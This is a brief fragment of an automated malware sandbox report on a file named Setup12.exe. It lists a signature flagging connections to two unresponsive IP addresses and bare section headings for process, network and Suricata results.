Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	192.168.56.102:49316
dead_host	35.205.61.67:443

Setup12.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All